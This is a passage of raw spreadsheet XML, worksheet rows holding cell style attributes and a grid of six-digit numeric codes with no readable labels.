      <c r="G63" s="82"/>
      <c r="H63" s="82"/>
      <c r="I63" s="83"/>
    </row>
    <row r="64" spans="1:9" ht="13.5">
      <c r="A64" s="14"/>
      <c r="B64" s="14"/>
      <c r="C64" s="1"/>
      <c r="D64" s="1"/>
      <c r="E64" s="1"/>
      <c r="F64" s="1"/>
      <c r="G64" s="1"/>
      <c r="H64" s="1"/>
      <c r="I64" s="35"/>
    </row>
    <row r="65" spans="1:9" ht="13.5">
      <c r="A65" s="14"/>
      <c r="B65" s="14"/>
      <c r="C65" s="1"/>
      <c r="D65" s="1"/>
      <c r="E65" s="1"/>
      <c r="F65" s="1"/>
      <c r="G65" s="1"/>
      <c r="H65" s="1"/>
      <c r="I65" s="35"/>
    </row>
    <row r="66" spans="1:9" ht="13.5">
      <c r="A66" s="14"/>
      <c r="B66" s="14"/>
      <c r="C66" s="1"/>
      <c r="D66" s="1"/>
      <c r="E66" s="1"/>
      <c r="F66" s="1"/>
      <c r="G66" s="1"/>
      <c r="H66" s="1"/>
      <c r="I66" s="35"/>
    </row>
    <row r="67" spans="1:9" ht="8.25" customHeight="1" thickBot="1">
      <c r="A67" s="84"/>
      <c r="B67" s="84"/>
      <c r="C67" s="85"/>
      <c r="D67" s="85"/>
      <c r="E67" s="85"/>
      <c r="F67" s="85"/>
      <c r="G67" s="85"/>
      <c r="H67" s="85"/>
      <c r="I67" s="86"/>
    </row>
    <row r="68" spans="11:18" s="45" customFormat="1" ht="16.5" customHeight="1" thickBot="1" thickTop="1">
      <c r="K68" s="42"/>
      <c r="L68" s="42"/>
      <c r="M68" s="42"/>
      <c r="N68" s="42"/>
      <c r="O68" s="42"/>
      <c r="P68" s="42"/>
      <c r="Q68" s="42"/>
      <c r="R68" s="42"/>
    </row>
    <row r="69" spans="1:18" s="45" customFormat="1" ht="16.5" customHeight="1" thickTop="1">
      <c r="A69" s="246" t="s">
        <v>96</v>
      </c>
      <c r="B69" s="243" t="s">
        <v>95</v>
      </c>
      <c r="C69" s="244"/>
      <c r="D69" s="244"/>
      <c r="E69" s="244"/>
      <c r="F69" s="244"/>
      <c r="G69" s="244"/>
      <c r="H69" s="244"/>
      <c r="I69" s="245"/>
      <c r="J69" s="242"/>
      <c r="K69" s="42"/>
      <c r="L69" s="42"/>
      <c r="M69" s="42"/>
      <c r="N69" s="42"/>
      <c r="O69" s="42"/>
      <c r="P69" s="42"/>
      <c r="Q69" s="42"/>
      <c r="R69" s="42"/>
    </row>
    <row r="70" spans="1:10" ht="14.25" customHeight="1" thickBot="1">
      <c r="A70" s="36" t="s">
        <v>35</v>
      </c>
      <c r="B70" s="88" t="s">
        <v>36</v>
      </c>
      <c r="C70" s="226"/>
      <c r="D70" s="89"/>
      <c r="E70" s="89"/>
      <c r="F70" s="89"/>
      <c r="G70" s="89"/>
      <c r="H70" s="89"/>
      <c r="I70" s="132"/>
      <c r="J70" s="139"/>
    </row>
    <row r="71" spans="1:10" ht="15" thickBot="1" thickTop="1">
      <c r="A71" s="87"/>
      <c r="B71" s="117"/>
      <c r="C71" s="90"/>
      <c r="D71" s="76"/>
      <c r="E71" s="118"/>
      <c r="F71" s="37"/>
      <c r="G71" s="37"/>
      <c r="H71" s="37"/>
      <c r="I71" s="142"/>
      <c r="J71" s="34"/>
    </row>
    <row r="72" spans="1:17" ht="14.25" thickTop="1">
      <c r="A72" s="161"/>
      <c r="B72" s="212">
        <v>535020</v>
      </c>
      <c r="C72" s="213">
        <v>552432</v>
      </c>
      <c r="D72" s="213">
        <v>558920</v>
      </c>
      <c r="E72" s="173">
        <v>625106</v>
      </c>
      <c r="F72" s="213">
        <v>655639</v>
      </c>
      <c r="G72" s="213">
        <v>942023</v>
      </c>
      <c r="H72" s="213">
        <v>944139</v>
      </c>
      <c r="I72" s="214">
        <v>946178</v>
      </c>
      <c r="J72" s="140"/>
      <c r="Q72" s="91"/>
    </row>
    <row r="73" spans="1:17" ht="13.5">
      <c r="A73" s="161"/>
      <c r="B73" s="145">
        <v>537620</v>
      </c>
      <c r="C73" s="131">
        <v>552521</v>
      </c>
      <c r="D73" s="131">
        <v>558921</v>
      </c>
      <c r="E73" s="131">
        <v>625111</v>
      </c>
      <c r="F73" s="131">
        <v>655650</v>
      </c>
      <c r="G73" s="131">
        <v>942024</v>
      </c>
      <c r="H73" s="131">
        <v>944203</v>
      </c>
      <c r="I73" s="138">
        <v>946220</v>
      </c>
      <c r="J73" s="140"/>
      <c r="Q73" s="91"/>
    </row>
    <row r="74" spans="1:17" ht="13.5">
      <c r="A74" s="161"/>
      <c r="B74" s="145">
        <v>5377</v>
      </c>
      <c r="C74" s="131">
        <v>552527</v>
      </c>
      <c r="D74" s="131">
        <v>558923</v>
      </c>
      <c r="E74" s="131">
        <v>625112</v>
      </c>
      <c r="F74" s="131">
        <v>655803</v>
      </c>
      <c r="G74" s="131">
        <v>942025</v>
      </c>
      <c r="H74" s="131">
        <v>944303</v>
      </c>
      <c r="I74" s="138">
        <v>946320</v>
      </c>
      <c r="J74" s="140"/>
      <c r="Q74" s="91"/>
    </row>
    <row r="75" spans="1:17" ht="13.5">
      <c r="A75" s="161"/>
      <c r="B75" s="145">
        <v>537703</v>
      </c>
      <c r="C75" s="131">
        <v>552532</v>
      </c>
      <c r="D75" s="131">
        <v>558925</v>
      </c>
      <c r="E75" s="131">
        <v>625120</v>
      </c>
      <c r="F75" s="131">
        <v>655811</v>
      </c>
      <c r="G75" s="131">
        <v>942027</v>
      </c>
      <c r="H75" s="131">
        <v>944311</v>
      </c>
      <c r="I75" s="138">
        <v>946403</v>
      </c>
      <c r="J75" s="140"/>
      <c r="Q75" s="9"/>
    </row>
    <row r="76" spans="1:17" ht="13.5">
      <c r="A76" s="162" t="s">
        <v>80</v>
      </c>
      <c r="B76" s="145">
        <v>537706</v>
      </c>
      <c r="C76" s="131">
        <v>552533</v>
      </c>
      <c r="D76" s="131">
        <v>558927</v>
      </c>
      <c r="E76" s="131">
        <v>625123</v>
      </c>
      <c r="F76" s="131">
        <v>655812</v>
      </c>
      <c r="G76" s="131">
        <v>942031</v>
      </c>
      <c r="H76" s="131">
        <v>944312</v>
      </c>
      <c r="I76" s="138">
        <v>946406</v>
      </c>
      <c r="J76" s="140"/>
      <c r="Q76" s="9"/>
    </row>
    <row r="77" spans="1:17" ht="12.75" customHeight="1">
      <c r="A77" s="19" t="s">
        <v>38</v>
      </c>
      <c r="B77" s="145">
        <v>537711</v>
      </c>
      <c r="C77" s="131">
        <v>552803</v>
      </c>
      <c r="D77" s="131">
        <v>558931</v>
      </c>
      <c r="E77" s="131">
        <v>625125</v>
      </c>
      <c r="F77" s="131">
        <v>655820</v>
      </c>
      <c r="G77" s="131">
        <v>942032</v>
      </c>
      <c r="H77" s="131">
        <v>944320</v>
      </c>
      <c r="I77" s="138">
        <v>946411</v>
      </c>
      <c r="J77" s="140"/>
      <c r="Q77" s="9"/>
    </row>
    <row r="78" spans="1:17" ht="12.75" customHeight="1">
      <c r="A78" s="124"/>
      <c r="B78" s="145">
        <v>537712</v>
      </c>
      <c r="C78" s="131">
        <v>552806</v>
      </c>
      <c r="D78" s="131">
        <v>558932</v>
      </c>
      <c r="E78" s="171">
        <v>625127</v>
      </c>
      <c r="F78" s="131">
        <v>655823</v>
      </c>
      <c r="G78" s="131">
        <v>942033</v>
      </c>
      <c r="H78" s="131">
        <v>944325</v>
      </c>
      <c r="I78" s="138">
        <v>946412</v>
      </c>
      <c r="J78" s="140"/>
      <c r="Q78" s="9"/>
    </row>
    <row r="79" spans="1:17" ht="12.75" customHeight="1">
      <c r="A79" s="125"/>
      <c r="B79" s="145">
        <v>537720</v>
      </c>
      <c r="C79" s="131">
        <v>552811</v>
      </c>
      <c r="D79" s="131">
        <v>558933</v>
      </c>
      <c r="E79" s="131">
        <v>625131</v>
      </c>
      <c r="F79" s="131">
        <v>655825</v>
      </c>
      <c r="G79" s="131">
        <v>942036</v>
      </c>
      <c r="H79" s="171">
        <v>944331</v>
      </c>
      <c r="I79" s="138">
        <v>946420</v>
      </c>
      <c r="J79" s="141"/>
      <c r="Q79" s="9"/>
    </row>
    <row r="80" spans="1:17" ht="13.5">
      <c r="A80" s="163"/>
      <c r="B80" s="145">
        <v>537721</v>
      </c>
      <c r="C80" s="131">
        <v>552812</v>
      </c>
      <c r="D80" s="131">
        <v>558939</v>
      </c>
      <c r="E80" s="131">
        <v>625132</v>
      </c>
      <c r="F80" s="131">
        <v>655827</v>
      </c>
      <c r="G80" s="131">
        <v>942039</v>
      </c>
      <c r="H80" s="171">
        <v>944350</v>
      </c>
      <c r="I80" s="138">
        <v>946423</v>
      </c>
      <c r="J80" s="141"/>
      <c r="Q80" s="9"/>
    </row>
    <row r="81" spans="1:17" ht="13.5">
      <c r="A81" s="163"/>
      <c r="B81" s="145">
        <v>537722</v>
      </c>
      <c r="C81" s="131">
        <v>552820</v>
      </c>
      <c r="D81" s="131">
        <v>559123</v>
      </c>
      <c r="E81" s="131">
        <v>625139</v>
      </c>
      <c r="F81" s="131">
        <v>655831</v>
      </c>
      <c r="G81" s="131">
        <v>942078</v>
      </c>
      <c r="H81" s="131">
        <v>944420</v>
      </c>
      <c r="I81" s="138">
        <v>946425</v>
      </c>
      <c r="J81" s="141"/>
      <c r="Q81" s="9"/>
    </row>
    <row r="82" spans="1:10" ht="13.5">
      <c r="A82" s="125"/>
      <c r="B82" s="145">
        <v>537723</v>
      </c>
      <c r="C82" s="131">
        <v>552821</v>
      </c>
      <c r="D82" s="171">
        <v>559620</v>
      </c>
      <c r="E82" s="131">
        <v>625178</v>
      </c>
      <c r="F82" s="131">
        <v>655832</v>
      </c>
      <c r="G82" s="131">
        <v>942132</v>
      </c>
      <c r="H82" s="131">
        <v>944520</v>
      </c>
      <c r="I82" s="138">
        <v>946427</v>
      </c>
      <c r="J82" s="141"/>
    </row>
    <row r="83" spans="1:10" ht="13.5">
      <c r="A83" s="125"/>
      <c r="B83" s="145">
        <v>537724</v>
      </c>
      <c r="C83" s="131">
        <v>552823</v>
      </c>
      <c r="D83" s="131">
        <v>604823</v>
      </c>
      <c r="E83" s="171">
        <v>625179</v>
      </c>
      <c r="F83" s="131">
        <v>655839</v>
      </c>
      <c r="G83" s="131">
        <v>942520</v>
      </c>
      <c r="H83" s="131">
        <v>944620</v>
      </c>
      <c r="I83" s="138">
        <v>946431</v>
      </c>
      <c r="J83" s="141"/>
    </row>
    <row r="84" spans="1:10" ht="13.5">
      <c r="A84" s="161"/>
      <c r="B84" s="145">
        <v>537725</v>
      </c>
      <c r="C84" s="131">
        <v>552831</v>
      </c>
      <c r="D84" s="131">
        <v>605615</v>
      </c>
      <c r="E84" s="131">
        <v>625220</v>
      </c>
      <c r="F84" s="131">
        <v>655850</v>
      </c>
      <c r="G84" s="131">
        <v>942620</v>
      </c>
      <c r="H84" s="131">
        <v>945003</v>
      </c>
      <c r="I84" s="138">
        <v>946432</v>
      </c>
      <c r="J84" s="141"/>
    </row>
    <row r="85" spans="1:10" ht="13.5">
      <c r="A85" s="161"/>
      <c r="B85" s="145">
        <v>537727</v>
      </c>
      <c r="C85" s="131">
        <v>552839</v>
      </c>
      <c r="D85" s="131">
        <v>620011</v>
      </c>
      <c r="E85" s="131">
        <v>625320</v>
      </c>
      <c r="F85" s="171">
        <v>655920</v>
      </c>
      <c r="G85" s="131">
        <v>943003</v>
      </c>
      <c r="H85" s="131">
        <v>945006</v>
      </c>
      <c r="I85" s="138">
        <v>946439</v>
      </c>
      <c r="J85" s="141"/>
    </row>
    <row r="86" spans="1:10" ht="13.5">
      <c r="A86" s="161"/>
      <c r="B86" s="145">
        <v>537731</v>
      </c>
      <c r="C86" s="131">
        <v>552920</v>
      </c>
      <c r="D86" s="131">
        <v>620027</v>
      </c>
      <c r="E86" s="131">
        <v>628179</v>
      </c>
      <c r="F86" s="171">
        <v>657020</v>
      </c>
      <c r="G86" s="131">
        <v>943006</v>
      </c>
      <c r="H86" s="131">
        <v>945011</v>
      </c>
      <c r="I86" s="138">
        <v>946478</v>
      </c>
      <c r="J86" s="141"/>
    </row>
    <row r="87" spans="1:10" ht="13.5">
      <c r="A87" s="161"/>
      <c r="B87" s="145">
        <v>537732</v>
      </c>
      <c r="C87" s="131">
        <v>553078</v>
      </c>
      <c r="D87" s="131">
        <v>620031</v>
      </c>
      <c r="E87" s="131">
        <v>628180</v>
      </c>
      <c r="F87" s="171">
        <v>657031</v>
      </c>
      <c r="G87" s="131">
        <v>943011</v>
      </c>
      <c r="H87" s="131">
        <v>945012</v>
      </c>
      <c r="I87" s="138">
        <v>946503</v>
      </c>
      <c r="J87" s="141"/>
    </row>
    <row r="88" spans="1:10" ht="13.5">
      <c r="A88" s="164"/>
      <c r="B88" s="145">
        <v>537733</v>
      </c>
      <c r="C88" s="131">
        <v>553178</v>
      </c>
      <c r="D88" s="131">
        <v>620039</v>
      </c>
      <c r="E88" s="131">
        <v>636078</v>
      </c>
      <c r="F88" s="171">
        <v>657032</v>
      </c>
      <c r="G88" s="131">
        <v>943012</v>
      </c>
      <c r="H88" s="131">
        <v>945020</v>
      </c>
      <c r="I88" s="138">
        <v>946520</v>
      </c>
      <c r="J88" s="141"/>
    </row>
    <row r="89" spans="1:10" ht="13.5">
      <c r="A89" s="164"/>
      <c r="B89" s="145">
        <v>537736</v>
      </c>
      <c r="C89" s="131">
        <v>553211</v>
      </c>
      <c r="D89" s="131">
        <v>620103</v>
      </c>
      <c r="E89" s="131">
        <v>636093</v>
      </c>
      <c r="F89" s="171">
        <v>657039</v>
      </c>
      <c r="G89" s="131">
        <v>943020</v>
      </c>
      <c r="H89" s="131">
        <v>945021</v>
      </c>
      <c r="I89" s="138">
        <v>946545</v>
      </c>
      <c r="J89" s="141"/>
    </row>
    <row r="90" spans="1:10" ht="13.5">
      <c r="A90" s="164"/>
      <c r="B90" s="145">
        <v>537739</v>
      </c>
      <c r="C90" s="131">
        <v>553212</v>
      </c>
      <c r="D90" s="131">
        <v>620106</v>
      </c>
      <c r="E90" s="131">
        <v>636094</v>
      </c>
      <c r="F90" s="131">
        <v>940010</v>
      </c>
      <c r="G90" s="131">
        <v>943021</v>
      </c>
      <c r="H90" s="131">
        <v>945023</v>
      </c>
      <c r="I90" s="138">
        <v>946550</v>
      </c>
      <c r="J90" s="141"/>
    </row>
    <row r="91" spans="1:10" ht="13.5">
      <c r="A91" s="164"/>
      <c r="B91" s="145">
        <v>538720</v>
      </c>
      <c r="C91" s="131">
        <v>553727</v>
      </c>
      <c r="D91" s="131">
        <v>620120</v>
      </c>
      <c r="E91" s="131">
        <v>636095</v>
      </c>
      <c r="F91" s="131">
        <v>940011</v>
      </c>
      <c r="G91" s="131">
        <v>943022</v>
      </c>
      <c r="H91" s="131">
        <v>945025</v>
      </c>
      <c r="I91" s="138">
        <v>946620</v>
      </c>
      <c r="J91" s="141"/>
    </row>
    <row r="92" spans="1:10" ht="13.5">
      <c r="A92" s="164"/>
      <c r="B92" s="145">
        <v>5388</v>
      </c>
      <c r="C92" s="131">
        <v>554578</v>
      </c>
      <c r="D92" s="131">
        <v>620123</v>
      </c>
      <c r="E92" s="131">
        <v>636189</v>
      </c>
      <c r="F92" s="131">
        <v>940012</v>
      </c>
      <c r="G92" s="131">
        <v>943023</v>
      </c>
      <c r="H92" s="131">
        <v>945027</v>
      </c>
      <c r="I92" s="138">
        <v>946720</v>
      </c>
      <c r="J92" s="141"/>
    </row>
    <row r="93" spans="1:10" ht="13.5">
      <c r="A93" s="164"/>
      <c r="B93" s="145">
        <v>538803</v>
      </c>
      <c r="C93" s="131">
        <v>554620</v>
      </c>
      <c r="D93" s="131">
        <v>620125</v>
      </c>
      <c r="E93" s="131">
        <v>639339</v>
      </c>
      <c r="F93" s="131">
        <v>940017</v>
      </c>
      <c r="G93" s="131">
        <v>943024</v>
      </c>
      <c r="H93" s="131">
        <v>945031</v>
      </c>
      <c r="I93" s="138">
        <v>947003</v>
      </c>
      <c r="J93" s="141"/>
    </row>
    <row r="94" spans="1:10" ht="13.5">
      <c r="A94" s="164"/>
      <c r="B94" s="145">
        <v>538806</v>
      </c>
      <c r="C94" s="131">
        <v>555078</v>
      </c>
      <c r="D94" s="131">
        <v>620132</v>
      </c>
      <c r="E94" s="131">
        <v>639578</v>
      </c>
      <c r="F94" s="131">
        <v>940020</v>
      </c>
      <c r="G94" s="131">
        <v>943025</v>
      </c>
      <c r="H94" s="131">
        <v>945032</v>
      </c>
      <c r="I94" s="138">
        <v>947006</v>
      </c>
      <c r="J94" s="141"/>
    </row>
    <row r="95" spans="1:10" ht="13.5">
      <c r="A95" s="164"/>
      <c r="B95" s="145">
        <v>538811</v>
      </c>
      <c r="C95" s="131">
        <v>5551</v>
      </c>
      <c r="D95" s="131">
        <v>620220</v>
      </c>
      <c r="E95" s="131">
        <v>646320</v>
      </c>
      <c r="F95" s="131">
        <v>940030</v>
      </c>
      <c r="G95" s="131">
        <v>943027</v>
      </c>
      <c r="H95" s="131">
        <v>945033</v>
      </c>
      <c r="I95" s="138">
        <v>947011</v>
      </c>
      <c r="J95" s="141"/>
    </row>
    <row r="96" spans="1:10" ht="13.5">
      <c r="A96" s="164"/>
      <c r="B96" s="145">
        <v>538812</v>
      </c>
      <c r="C96" s="131">
        <v>555103</v>
      </c>
      <c r="D96" s="131">
        <v>620278</v>
      </c>
      <c r="E96" s="131">
        <v>654103</v>
      </c>
      <c r="F96" s="131">
        <v>940040</v>
      </c>
      <c r="G96" s="131">
        <v>943031</v>
      </c>
      <c r="H96" s="131">
        <v>945037</v>
      </c>
      <c r="I96" s="138">
        <v>947012</v>
      </c>
      <c r="J96" s="141"/>
    </row>
    <row r="97" spans="1:10" ht="13.5">
      <c r="A97" s="164"/>
      <c r="B97" s="145">
        <v>538820</v>
      </c>
      <c r="C97" s="131">
        <v>555106</v>
      </c>
      <c r="D97" s="131">
        <v>620812</v>
      </c>
      <c r="E97" s="131">
        <v>654111</v>
      </c>
      <c r="F97" s="131">
        <v>940050</v>
      </c>
      <c r="G97" s="131">
        <v>943032</v>
      </c>
      <c r="H97" s="131">
        <v>945039</v>
      </c>
      <c r="I97" s="138">
        <v>947020</v>
      </c>
      <c r="J97" s="141"/>
    </row>
    <row r="98" spans="1:10" ht="13.5">
      <c r="A98" s="164"/>
      <c r="B98" s="145">
        <v>538821</v>
      </c>
      <c r="C98" s="131">
        <v>555123</v>
      </c>
      <c r="D98" s="131">
        <v>621003</v>
      </c>
      <c r="E98" s="131">
        <v>654112</v>
      </c>
      <c r="F98" s="131">
        <v>940701</v>
      </c>
      <c r="G98" s="131">
        <v>943033</v>
      </c>
      <c r="H98" s="131">
        <v>945078</v>
      </c>
      <c r="I98" s="138">
        <v>947021</v>
      </c>
      <c r="J98" s="141"/>
    </row>
    <row r="99" spans="1:10" ht="13.5">
      <c r="A99" s="164"/>
      <c r="B99" s="145">
        <v>538822</v>
      </c>
      <c r="C99" s="131">
        <v>555125</v>
      </c>
      <c r="D99" s="171">
        <v>621006</v>
      </c>
      <c r="E99" s="131">
        <v>654120</v>
      </c>
      <c r="F99" s="131">
        <v>940702</v>
      </c>
      <c r="G99" s="131">
        <v>943036</v>
      </c>
      <c r="H99" s="131">
        <v>945220</v>
      </c>
      <c r="I99" s="138">
        <v>947023</v>
      </c>
      <c r="J99" s="141"/>
    </row>
    <row r="100" spans="1:10" ht="13.5">
      <c r="A100" s="164"/>
      <c r="B100" s="145">
        <v>538823</v>
      </c>
      <c r="C100" s="131">
        <v>555127</v>
      </c>
      <c r="D100" s="131">
        <v>621011</v>
      </c>
      <c r="E100" s="131">
        <v>654123</v>
      </c>
      <c r="F100" s="131">
        <v>9410</v>
      </c>
      <c r="G100" s="131">
        <v>943039</v>
      </c>
      <c r="H100" s="131">
        <v>945520</v>
      </c>
      <c r="I100" s="138">
        <v>947025</v>
      </c>
      <c r="J100" s="141"/>
    </row>
    <row r="101" spans="1:10" ht="13.5">
      <c r="A101" s="164"/>
      <c r="B101" s="145">
        <v>538824</v>
      </c>
      <c r="C101" s="131">
        <v>555220</v>
      </c>
      <c r="D101" s="131">
        <v>621012</v>
      </c>
      <c r="E101" s="131">
        <v>654125</v>
      </c>
      <c r="F101" s="131">
        <v>941003</v>
      </c>
      <c r="G101" s="131">
        <v>943078</v>
      </c>
      <c r="H101" s="131">
        <v>945620</v>
      </c>
      <c r="I101" s="138">
        <v>947027</v>
      </c>
      <c r="J101" s="141"/>
    </row>
    <row r="102" spans="1:10" ht="13.5">
      <c r="A102" s="164"/>
      <c r="B102" s="145">
        <v>538825</v>
      </c>
      <c r="C102" s="131">
        <v>556678</v>
      </c>
      <c r="D102" s="131">
        <v>621020</v>
      </c>
      <c r="E102" s="131">
        <v>654127</v>
      </c>
      <c r="F102" s="131">
        <v>941006</v>
      </c>
      <c r="G102" s="131">
        <v>943132</v>
      </c>
      <c r="H102" s="131">
        <v>945720</v>
      </c>
      <c r="I102" s="138">
        <v>947031</v>
      </c>
      <c r="J102" s="141"/>
    </row>
    <row r="103" spans="1:10" ht="13.5">
      <c r="A103" s="164"/>
      <c r="B103" s="145">
        <v>538827</v>
      </c>
      <c r="C103" s="131">
        <v>558420</v>
      </c>
      <c r="D103" s="131">
        <v>621023</v>
      </c>
      <c r="E103" s="131">
        <v>654131</v>
      </c>
      <c r="F103" s="131">
        <v>941011</v>
      </c>
      <c r="G103" s="131">
        <v>943520</v>
      </c>
      <c r="H103" s="131">
        <v>946003</v>
      </c>
      <c r="I103" s="138">
        <v>947032</v>
      </c>
      <c r="J103" s="141"/>
    </row>
    <row r="104" spans="1:10" ht="13.5">
      <c r="A104" s="164"/>
      <c r="B104" s="145">
        <v>538831</v>
      </c>
      <c r="C104" s="131">
        <v>558453</v>
      </c>
      <c r="D104" s="131">
        <v>621025</v>
      </c>
      <c r="E104" s="131">
        <v>654132</v>
      </c>
      <c r="F104" s="131">
        <v>941012</v>
      </c>
      <c r="G104" s="131">
        <v>943920</v>
      </c>
      <c r="H104" s="131">
        <v>946006</v>
      </c>
      <c r="I104" s="138">
        <v>947033</v>
      </c>
      <c r="J104" s="141"/>
    </row>
    <row r="105" spans="1:10" ht="13.5">
      <c r="A105" s="164"/>
      <c r="B105" s="145">
        <v>538832</v>
      </c>
      <c r="C105" s="131">
        <v>5585</v>
      </c>
      <c r="D105" s="171">
        <v>621027</v>
      </c>
      <c r="E105" s="131">
        <v>654139</v>
      </c>
      <c r="F105" s="131">
        <v>941020</v>
      </c>
      <c r="G105" s="131">
        <v>943921</v>
      </c>
      <c r="H105" s="131">
        <v>946011</v>
      </c>
      <c r="I105" s="138">
        <v>947039</v>
      </c>
      <c r="J105" s="141"/>
    </row>
    <row r="106" spans="1:10" ht="13.5">
      <c r="A106" s="164"/>
      <c r="B106" s="145">
        <v>538833</v>
      </c>
      <c r="C106" s="131">
        <v>558503</v>
      </c>
      <c r="D106" s="131">
        <v>621031</v>
      </c>
      <c r="E106" s="131">
        <v>654150</v>
      </c>
      <c r="F106" s="131">
        <v>941021</v>
      </c>
      <c r="G106" s="131">
        <v>943925</v>
      </c>
      <c r="H106" s="131">
        <v>946012</v>
      </c>
      <c r="I106" s="138">
        <v>947078</v>
      </c>
      <c r="J106" s="141"/>
    </row>
    <row r="107" spans="1:10" ht="13.5">
      <c r="A107" s="164"/>
      <c r="B107" s="145">
        <v>538836</v>
      </c>
      <c r="C107" s="131">
        <v>558506</v>
      </c>
      <c r="D107" s="131">
        <v>621032</v>
      </c>
      <c r="E107" s="131">
        <v>654203</v>
      </c>
      <c r="F107" s="131">
        <v>941022</v>
      </c>
      <c r="G107" s="131">
        <v>943978</v>
      </c>
      <c r="H107" s="131">
        <v>946020</v>
      </c>
      <c r="I107" s="138">
        <v>947520</v>
      </c>
      <c r="J107" s="141"/>
    </row>
    <row r="108" spans="1:10" ht="13.5">
      <c r="A108" s="164"/>
      <c r="B108" s="145">
        <v>538839</v>
      </c>
      <c r="C108" s="131">
        <v>558511</v>
      </c>
      <c r="D108" s="131">
        <v>621039</v>
      </c>
      <c r="E108" s="131">
        <v>654211</v>
      </c>
      <c r="F108" s="131">
        <v>941023</v>
      </c>
      <c r="G108" s="131">
        <v>944003</v>
      </c>
      <c r="H108" s="131">
        <v>946021</v>
      </c>
      <c r="I108" s="175">
        <v>949048</v>
      </c>
      <c r="J108" s="141"/>
    </row>
    <row r="109" spans="1:10" ht="13.5">
      <c r="A109" s="164"/>
      <c r="B109" s="145">
        <v>548020</v>
      </c>
      <c r="C109" s="131">
        <v>558512</v>
      </c>
      <c r="D109" s="131">
        <v>621078</v>
      </c>
      <c r="E109" s="131">
        <v>654212</v>
      </c>
      <c r="F109" s="131">
        <v>941024</v>
      </c>
      <c r="G109" s="131">
        <v>944006</v>
      </c>
      <c r="H109" s="131">
        <v>946023</v>
      </c>
      <c r="I109" s="175">
        <v>949049</v>
      </c>
      <c r="J109" s="141"/>
    </row>
    <row r="110" spans="1:10" ht="13.5">
      <c r="A110" s="164"/>
      <c r="B110" s="145">
        <v>548213</v>
      </c>
      <c r="C110" s="131">
        <v>558520</v>
      </c>
      <c r="D110" s="171">
        <v>621079</v>
      </c>
      <c r="E110" s="131">
        <v>654220</v>
      </c>
      <c r="F110" s="131">
        <v>941025</v>
      </c>
      <c r="G110" s="131">
        <v>944011</v>
      </c>
      <c r="H110" s="131">
        <v>946025</v>
      </c>
      <c r="I110" s="138">
        <v>949071</v>
      </c>
      <c r="J110" s="141"/>
    </row>
    <row r="111" spans="1:10" ht="13.5">
      <c r="A111" s="164"/>
      <c r="B111" s="145">
        <v>548596</v>
      </c>
      <c r="C111" s="131">
        <v>558521</v>
      </c>
      <c r="D111" s="131">
        <v>621220</v>
      </c>
      <c r="E111" s="131">
        <v>654223</v>
      </c>
      <c r="F111" s="131">
        <v>941027</v>
      </c>
      <c r="G111" s="131">
        <v>944012</v>
      </c>
      <c r="H111" s="131">
        <v>946027</v>
      </c>
      <c r="I111" s="138">
        <v>949072</v>
      </c>
      <c r="J111" s="141"/>
    </row>
    <row r="112" spans="1:10" ht="13.5">
      <c r="A112" s="164"/>
      <c r="B112" s="145">
        <v>548732</v>
      </c>
      <c r="C112" s="131">
        <v>558522</v>
      </c>
      <c r="D112" s="131">
        <v>621249</v>
      </c>
      <c r="E112" s="131">
        <v>654225</v>
      </c>
      <c r="F112" s="131">
        <v>941031</v>
      </c>
      <c r="G112" s="131">
        <v>944021</v>
      </c>
      <c r="H112" s="131">
        <v>946031</v>
      </c>
      <c r="I112" s="138">
        <v>949080</v>
      </c>
      <c r="J112" s="141"/>
    </row>
    <row r="113" spans="1:10" ht="13.5">
      <c r="A113" s="164"/>
      <c r="B113" s="145">
        <v>5521</v>
      </c>
      <c r="C113" s="131">
        <v>558523</v>
      </c>
      <c r="D113" s="131">
        <v>625003</v>
      </c>
      <c r="E113" s="131">
        <v>654227</v>
      </c>
      <c r="F113" s="131">
        <v>941032</v>
      </c>
      <c r="G113" s="131">
        <v>944023</v>
      </c>
      <c r="H113" s="131">
        <v>946032</v>
      </c>
      <c r="I113" s="138">
        <v>949081</v>
      </c>
      <c r="J113" s="141"/>
    </row>
    <row r="114" spans="1:10" ht="13.5">
      <c r="A114" s="164"/>
      <c r="B114" s="145">
        <v>552103</v>
      </c>
      <c r="C114" s="131">
        <v>558524</v>
      </c>
      <c r="D114" s="131">
        <v>625006</v>
      </c>
      <c r="E114" s="131">
        <v>654231</v>
      </c>
      <c r="F114" s="131">
        <v>941033</v>
      </c>
      <c r="G114" s="131">
        <v>944025</v>
      </c>
      <c r="H114" s="131">
        <v>946033</v>
      </c>
      <c r="I114" s="138">
        <v>949082</v>
      </c>
      <c r="J114" s="141"/>
    </row>
    <row r="115" spans="1:10" ht="13.5">
      <c r="A115" s="164"/>
      <c r="B115" s="145">
        <v>552106</v>
      </c>
      <c r="C115" s="131">
        <v>558525</v>
      </c>
      <c r="D115" s="131">
        <v>625011</v>
      </c>
      <c r="E115" s="131">
        <v>654232</v>
      </c>
      <c r="F115" s="131">
        <v>941036</v>
      </c>
      <c r="G115" s="131">
        <v>944027</v>
      </c>
      <c r="H115" s="131">
        <v>946039</v>
      </c>
      <c r="I115" s="138">
        <v>953001</v>
      </c>
      <c r="J115" s="141"/>
    </row>
    <row r="116" spans="1:10" ht="13.5">
      <c r="A116" s="164"/>
      <c r="B116" s="145">
        <v>552111</v>
      </c>
      <c r="C116" s="131">
        <v>558527</v>
      </c>
      <c r="D116" s="131">
        <v>625012</v>
      </c>
      <c r="E116" s="131">
        <v>654239</v>
      </c>
      <c r="F116" s="131">
        <v>941039</v>
      </c>
      <c r="G116" s="131">
        <v>944031</v>
      </c>
      <c r="H116" s="131">
        <v>9461</v>
      </c>
      <c r="I116" s="138">
        <v>953002</v>
      </c>
      <c r="J116" s="141"/>
    </row>
    <row r="117" spans="1:10" ht="13.5">
      <c r="A117" s="164"/>
      <c r="B117" s="145">
        <v>552112</v>
      </c>
      <c r="C117" s="131">
        <v>558531</v>
      </c>
      <c r="D117" s="131">
        <v>625020</v>
      </c>
      <c r="E117" s="131">
        <v>654250</v>
      </c>
      <c r="F117" s="131">
        <v>941078</v>
      </c>
      <c r="G117" s="131">
        <v>944032</v>
      </c>
      <c r="H117" s="131">
        <v>946103</v>
      </c>
      <c r="I117" s="138">
        <v>953003</v>
      </c>
      <c r="J117" s="141"/>
    </row>
    <row r="118" spans="1:10" ht="13.5">
      <c r="A118" s="164"/>
      <c r="B118" s="145">
        <v>552121</v>
      </c>
      <c r="C118" s="131">
        <v>558532</v>
      </c>
      <c r="D118" s="171">
        <v>625023</v>
      </c>
      <c r="E118" s="131">
        <v>655603</v>
      </c>
      <c r="F118" s="131">
        <v>941520</v>
      </c>
      <c r="G118" s="131">
